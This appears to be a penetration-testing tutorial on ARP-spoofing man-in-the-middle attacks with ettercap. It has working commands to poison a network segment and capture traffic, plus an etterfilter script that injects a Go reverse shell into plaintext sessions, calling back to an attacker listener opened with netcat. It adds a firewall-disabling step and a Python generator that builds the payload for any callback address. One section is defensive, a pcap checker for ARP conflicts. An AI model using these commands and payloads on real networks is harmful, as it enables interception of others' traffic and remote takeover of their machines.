MITM (Man in the Middle) Attack

Establish MITM

Using ARP Spoofing

On the machine that will run ettercap (this page calls it the target machine: a box you control that sits on the same L2 segment as the victims, since ARP spoofing does not cross routers),

# -T: text-only interface
# -i: interface to sniff and poison on
# -M arp: ARP-poisoning man-in-the-middle
# -w: write the captured packets to a .pcap file
# With no TARGET arguments every host on the segment is poisoned; when you can,
# scope it with two targets, e.g. "/<victim-ip>// /<gateway-ip>//".
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap

On your local machine, fetch ettercap's output file.

scp victim@<target-ip>:/tmp/ettercap.pcap .

# Inspect the capture (duplicate IP-to-MAC claims in the ARP replies confirm the poisoning worked)
wireshark ettercap.pcap
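Wireshark is the quickest way to eyeball the capture, but the same check can be scripted. The following is an added example, not part of the original page: a dependency-free Python reader for a classic pcap file that collects every IP-to-MAC claim made in ARP replies and reports IPs claimed by more than one MAC, which is exactly what ettercap's poisoning leaves behind. The gateway/victim/attacker addresses and the frames are constructed sample data, not a real capture; replace SAMPLE input with `open("ettercap.pcap", "rb").read()` to run it on the file fetched above.

```python
import struct
import sys
from collections import defaultdict

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def build_pcap(frames):
    """Wrap raw Ethernet frames in a minimal little-endian classic pcap (LINKTYPE_ETHERNET)."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    records = b"".join(
        struct.pack("<IIII", i, 0, len(f), len(f)) + f for i, f in enumerate(frames)
    )
    return header + records


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build one Ethernet + ARP 'is-at' reply frame (constructed test data, not captured traffic)."""
    eth = target_mac + sender_mac + struct.pack(">H", ETHERTYPE_ARP)
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, ARP_REPLY) + sender_mac + sender_ip + target_mac + target_ip
    return eth + arp


def iter_frames(pcap):
    """Yield the captured bytes of each record, honouring the file's byte order."""
    magic, = struct.unpack("<I", pcap[:4])
    if magic == 0xA1B2C3D4:
        order = "<"
    elif magic == 0xD4C3B2A1:
        order = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(order + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def find_arp_conflicts(pcap):
    """Return {ip: {mac, ...}} for every IP that more than one MAC claimed in an ARP reply."""
    claims = defaultdict(set)
    for frame in iter_frames(pcap):
        # Ethernet header is 14 bytes; a full ARP body is 28 bytes (offsets below are absolute).
        if len(frame) < 42 or struct.unpack(">H", frame[12:14])[0] != ETHERTYPE_ARP:
            continue
        if struct.unpack(">H", frame[20:22])[0] != ARP_REPLY:
            continue
        claims[ip_str(frame[28:32])].add(mac_str(frame[22:28]))
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


def suspect_macs(conflicts):
    """A MAC that shows up in conflicts for several IPs is the likely poisoner."""
    seen = defaultdict(int)
    for macs in conflicts.values():
        for mac in macs:
            seen[mac] += 1
    return {mac for mac, n in seen.items() if n > 1}


# Constructed sample: a gateway and a victim answering honestly, then the attacker
# claiming both addresses (bidirectional poisoning, as ettercap -M arp does).
GW_IP, GW_MAC = bytes([192, 168, 1, 1]), bytes.fromhex("aabbccddee01")
VICTIM_IP, VICTIM_MAC = bytes([192, 168, 1, 10]), bytes.fromhex("66778899aabb")
ATTACKER_MAC = bytes.fromhex("001122334455")

CLEAN_FRAMES = [
    arp_reply(GW_MAC, GW_IP, VICTIM_MAC, VICTIM_IP),
    arp_reply(VICTIM_MAC, VICTIM_IP, GW_MAC, GW_IP),
]
POISON_FRAMES = [
    arp_reply(ATTACKER_MAC, GW_IP, VICTIM_MAC, VICTIM_IP),
    arp_reply(ATTACKER_MAC, VICTIM_IP, GW_MAC, GW_IP),
]
CLEAN_PCAP = build_pcap(CLEAN_FRAMES)
POISONED_PCAP = build_pcap(CLEAN_FRAMES + POISON_FRAMES)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else POISONED_PCAP
    conflicts = find_arp_conflicts(data)
    for ip, macs in sorted(conflicts.items()):
        print(f"{ip} claimed by {', '.join(sorted(macs))}")
    print("suspect MAC(s):", ", ".join(sorted(suspect_macs(conflicts))) or "none")
```

A single conflict is not proof on its own (a DHCP lease moving to another host or a failover pair changing MACs looks the same); the stronger signal is one MAC answering for two or more IPs it does not own, which is what `suspect_macs` isolates.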

Gain Access to a Shell

Reverse Shell Via ARP Spoofing

On the target machine, create an etterfilter script "whoami.ecf". It matches plaintext TCP data sent from port 4444 (for example an operator's listener typing into a shell session) that contains "whoami", logs it, and swaps the word for a command that writes and runs a Go reverse shell on the victim. The payload therefore only fires if the traffic is unencrypted and the victim host has a Go toolchain installed.

// whoami.ecf
if (ip.proto == TCP && tcp.src == 4444 && search(DATA.data, "whoami")) {
    log(DATA.data, "/root/ettercap.log");
    replace("whoami", "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"<target-eth1-ip>:6666\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go &");
    msg("###### ETTERFILTER: substituted 'whoami' with reverse shell.  ######\n");
}

Compile the filter with etterfilter

# -o: compiled filter that ettercap loads with -F
etterfilter whoami.ecf -o whoami.ef

Open a listener in the background

nc -lvnp 6666 &

Allow the incoming connection through the firewall

# <victim-ip> is the host that will execute the substituted command and connect back
ufw allow in on eth1 from <victim-ip> to <target-eth1-ip> port 6666 proto tcp
# or, bluntly
ufw disable

Run ettercap with the compiled filter.

# -F: load a compiled filter
ettercap -T -i eth1 -M arp -F whoami.ef

Once someone types "whoami" in a matching session, ettercap prints the ETTERFILTER message and the listener shows "Connection received on <victim-ip> <port>".
If so, quit ettercap with "q" and bring the listener to the foreground with "fg".
You can then interact with the victim's shell.
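The filter above is awkward to get right by hand: the Go source carries double quotes, the shell command wraps it in single quotes, and etterfilter needs every inner double quote escaped as \" inside its own string literal, and a missing closing brace only shows up when etterfilter refuses to compile. The following is an added example, not from the original page or from the ettercap project: a Python generator that assembles the same three layers for a given callback address and port, and a small well-formedness check (balanced braces and string literals, honouring \" escapes) to run before calling etterfilter. The callback address 10.0.0.5 used at the bottom is a placeholder assumption; "//" comments are not handled by the checker.

```python
# Go reverse shell exactly as used in the filter above, with the callback address parameterised.
GO_REVERSE_SHELL = (
    'package main;import"os/exec";import"net";'
    'func main(){c,_:=net.Dial("tcp","%s:%d");'
    'cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}'
)


def etterfilter_string(s):
    """Escape a value for use inside an etterfilter double-quoted string literal."""
    if "\\" in s:
        # Keep the escaping rules simple: the payload must not need backslashes.
        raise ValueError("backslashes in payload are not supported")
    return s.replace('"', '\\"')


def shell_command(callback_ip, callback_port, go_path="/tmp/t.go"):
    """Shell one-liner that drops the Go source and runs it in the background on the victim."""
    go_src = GO_REVERSE_SHELL % (callback_ip, callback_port)
    if "'" in go_src:
        raise ValueError("single quote would break the shell single-quoting")
    return f"echo '{go_src}' > {go_path} && go run {go_path} &"


def build_filter(callback_ip, callback_port, trigger="whoami", src_port=4444,
                 log_path="/root/ettercap.log"):
    """Render the complete .ecf text: match plaintext TCP data from src_port containing trigger,
    log it, replace the trigger with the payload, and announce the substitution."""
    payload = etterfilter_string(shell_command(callback_ip, callback_port))
    lines = [
        f'if (ip.proto == TCP && tcp.src == {src_port} && search(DATA.data, "{trigger}")) {{',
        f'    log(DATA.data, "{log_path}");',
        f'    replace("{trigger}", "{payload}");',
        f'    msg("###### ETTERFILTER: substituted \'{trigger}\' with reverse shell. ######\\n");',
        "}",
    ]
    return "\n".join(lines) + "\n"


def filter_is_well_formed(text):
    """True if braces balance and every string literal is closed, skipping over escaped characters."""
    depth = 0
    in_string = False
    i = 0
    while i < len(text):
        ch = text[i]
        if in_string:
            if ch == "\\":
                i += 2          # skip the escaped character (\" or \n)
                continue
            if ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth < 0:
                return False
        i += 1
    return depth == 0 and not in_string


if __name__ == "__main__":
    ecf = build_filter("10.0.0.5", 6666)   # assumed callback address and port
    assert filter_is_well_formed(ecf)
    with open("whoami.ecf", "w") as f:
        f.write(ecf)
    print(ecf, end="")
```

Run it, then `etterfilter whoami.ecf -o whoami.ef` as above; `filter_is_well_formed` is what catches the dropped closing brace before etterfilter does.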